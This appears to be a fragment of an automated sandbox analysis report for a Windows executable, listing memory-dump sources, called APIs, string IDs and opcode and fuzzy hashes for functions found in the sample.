                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ItemMessageSend
                                  • String ID:
                                  • API String ID: 3015471070-0
                                  • Opcode ID: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                  • Instruction ID: f73c5da4045c7b9042b74fc2b95e0815cf011c0f2b21ea6afad4b4eadeaceea1
                                  • Opcode Fuzzy Hash: 39a766f13ec939f6e1c3257cb9b2c56e534004cb78ff04812ec539a8ae924e80
                                  • Instruction Fuzzy Hash: 9BD01750F1868683E620BB11B41D33DD251AB92FA8F900235D98E9A795CF2DB2268B94
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID:
                                  • API String ID: 1611563598-0
                                  • Opcode ID: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                  • Instruction ID: 7291791f2ea7436942b898a02987d59c40d14693168a316f435abba37c024a63
                                  • Opcode Fuzzy Hash: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                  • Instruction Fuzzy Hash: 44C08C20F01602C3DA08BF26E8C912CA2A0BB50F14FA08134C90CC12A0DF2CE6AA8791
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File
                                  • String ID:
                                  • API String ID: 749574446-0
                                  • Opcode ID: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                  • Instruction ID: dead2b55da87e389424869f51ed547eaafa8f6c32ddbaab43d8e4f8add657dbb
                                  • Opcode Fuzzy Hash: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                  • Instruction Fuzzy Hash: BFB09210B06541C2D6047B22ECC252D9334AB88F11BD84420D90DD1220CF1CD9EB9B00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                  • String ID: %ls$%s: %s
                                  • API String ID: 2539828978-2259941744
                                  • Opcode ID: 1d3cbc19e4e1dbb22a2acefae036e62ad68edc13d54aabbef10823836ec3d9f6
                                  • Instruction ID: 3bf188de8e7915b38d08821cfecb79721da16fad43194b68894979869920e281
                                  • Opcode Fuzzy Hash: 1d3cbc19e4e1dbb22a2acefae036e62ad68edc13d54aabbef10823836ec3d9f6
                                  • Instruction Fuzzy Hash: D9B28262A1868243EA10BF25F4541BEE351EFC5BA0F914336E69D877D6EF2CF6408391
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 1759834784-2761157908
                                  • Opcode ID: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                  • Instruction ID: fb5a31804df7cef442f635d124504af7e4cd3aca58eedfc80f2bdd524364898e
                                  • Opcode Fuzzy Hash: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                  • Instruction Fuzzy Hash: 3AB2F4B2A082828BE725AF25A4407FDF7A5FB54B98F905135DE0997B84DF3CF5048B90
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 1693479884-0
                                  • Opcode ID: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
                                  • Instruction ID: e13ca9e346d50fc15bfa2c16fd4ab821c5c152e9f67d193fbb68630d177a6cff
                                  • Opcode Fuzzy Hash: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
                                  • Instruction Fuzzy Hash: 55A1AE62F14A5186FF00AF79A8445BDE361AB44FB4B954331DE2D97BC8DF2CE2818391
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 3140674995-0
                                  • Opcode ID: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                  • Instruction ID: 4f1f8da75f9bfe621f77a5ebbe80650ce78e1b96e6557e6f1c1dd28d5a037448
                                  • Opcode Fuzzy Hash: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                  • Instruction Fuzzy Hash: D7316772604B818AE7609F60F8507EDB364FB44B58F844039DA4D87B95DF7CE658C750
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                  • String ID:
                                  • API String ID: 1239891234-0
                                  • Opcode ID: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                  • Instruction ID: 3f103a67700bd5e7485ea979b1e7b773c7868082a86590c1c36afecf7f7f7ed2
                                  • Opcode Fuzzy Hash: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                  • Instruction Fuzzy Hash: 85318532608B8186D720DF25F8406AEF3A4FB88B64F900135EE8D83B65DF3CE6558B50
                                  APIs
                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B2F54
                                    • Part of subcall function 00007FF7C01AAEC4: GetCurrentProcess.KERNEL32(00007FF7C01B415D), ref: 00007FF7C01AAEF1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                  • String ID: *?$.
                                  • API String ID: 2518042432-3972193922
                                  • Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                  • Instruction ID: 82322f51975f6d5aebcd4b1285ba80e3aafd9fb7b838d473ea164ec035252f17
                                  • Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                  • Instruction Fuzzy Hash: 2A5109A2B1879546EB10EF66A8000BCE7A4FF44FE4B844535EE1D97B85DF3CE0558360
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: memcpy_s
                                  • String ID:
                                  • API String ID: 1502251526-0
                                  • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                  • Instruction ID: 4cec039fff3f636ea38f6de0bd58f786987b8b29214b43fe8874407cad9b5c97
                                  • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                  • Instruction Fuzzy Hash: A7D18FB2B1828687DB249F15B18476EF7A1FB88B94F948134DF4A97B44DB3CF8418B50
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7C018FD53), ref: 00007FF7C0183C05
                                  • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF7C018FD53), ref: 00007FF7C0183C39
                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF7C018FD53), ref: 00007FF7C0183C63
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFormatFreeLastLocalMessage
                                  • String ID:
                                  • API String ID: 1365068426-0
                                  • Opcode ID: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                  • Instruction ID: d823fe8804a24357c11dfbe1173864452c0a4382b66dff52d8071fe1920e8b8d
                                  • Opcode Fuzzy Hash: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                  • Instruction Fuzzy Hash: 70011A7160C78682E610AF26B48057EE3A1BB89FE0F884135EA4D86B45DF3CE6159B90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                  • Instruction ID: 5b688ceb10e06e9329df5843130841be537d1ff1ccb007b40d973dd0aac6d272
                                  • Opcode Fuzzy Hash: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                  • Instruction Fuzzy Hash: 4B31D861B186D146E720AE26F8057BEEA95AB44FF4F848235EE6C87BC5CF3CE5118340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise_clrfp
                                  • String ID:
                                  • API String ID: 15204871-0
                                  • Opcode ID: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                  • Instruction ID: 1474910c3c5f1c8b7ed5eb7354ff25b8e3a2235f2bacd175759d3c391bb52b32
                                  • Opcode Fuzzy Hash: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                  • Instruction Fuzzy Hash: E9B17CB3A00B858BEB15DF29D88536CBBA0F784F68F148921DE5D837A4CB39E452C750
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ObjectRelease$CapsDevice
                                  • String ID:
                                  • API String ID: 1061551593-0
                                  • Opcode ID: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                  • Instruction ID: ede7f26def6446bf8fae1fe34eb8726760dd0d8ecd39a1ede9c0153adc0373f2
                                  • Opcode Fuzzy Hash: a39c6f5289eeb3ccdb5d0bd3d1d8e799027f00d468a18c17e9e0985c25432a47
                                  • Instruction Fuzzy Hash: A6813C76B18A458AEB10DF6AE48066DB771FB88F98F404122DE4E97B64DF3CE105C790
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FormatInfoLocaleNumber
                                  • String ID:
                                  • API String ID: 2169056816-0
                                  • Opcode ID: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                  • Instruction ID: 5e66286862c72a2eed7f78a8369a3bedfb4c765eec361d0929c5b8485deb56b4
                                  • Opcode Fuzzy Hash: 8ec788ba47fdf6df10e78e7ac2cd74069c16868f0c385ff3f057b0f2eb63ee47
                                  • Instruction Fuzzy Hash: 59115B62A18B8496E621AF51F4402ADF3A0EF88B64FC44135DA4D43B58DF3CF245C794
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Version
                                  • String ID:
                                  • API String ID: 1889659487-0
                                  • Opcode ID: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                  • Instruction ID: eab1ce3be21e9f65a388d7816d3cb34d48b545192b6c6bed2589d76492bbf0b3
                                  • Opcode Fuzzy Hash: 4077126cdc8ab987fc50741f9daa8f64bdc94cd5a3d95bfaac1a76796dfe440a
                                  • Instruction Fuzzy Hash: B301E9759186428BE624AF04F85177DF3A1FB98B64F900234E65D87794DB3CF6019FA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID: 0
                                  • API String ID: 3215553584-4108050209
                                  • Opcode ID: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                  • Instruction ID: e70644adc0295f1f2906be6e495cc143712544482b196dd2f7ca05a9627a580f
                                  • Opcode Fuzzy Hash: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
                                  • Instruction Fuzzy Hash: D081D622B1824287EAA8BE25704067EE391EF41F64FD41531DD09D7796CF2DF86687E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID: 0
                                  • API String ID: 3215553584-4108050209
                                  • Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                  • Instruction ID: fcc38b3ae2788a904c8522abeba2592006215f486b20021b75dafd50ef6e704b
                                  • Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
                                  • Instruction Fuzzy Hash: 1471C621A082C24BEB64AE2574802BDD790AB41F64F980535DE09C77D7CF2DFA658FE1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                  • Instruction ID: c45ef560e090a5c9c55f7b093e1b74bc13fab942a8046819351bbbdf98075bad
                                  • Opcode Fuzzy Hash: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
                                  • Instruction Fuzzy Hash: CE41DF72714A548AEE04EF6AE4542ADF3A1A758FE0B899036DE0DCB755EF3CE042C340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: HeapProcess
                                  • String ID:
                                  • API String ID: 54951025-0
                                  • Opcode ID: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
                                  • Instruction ID: 693f46eb205c6421564c3e81c1a07ea2560b3ceca33ff3306e68fe6066ac5b72
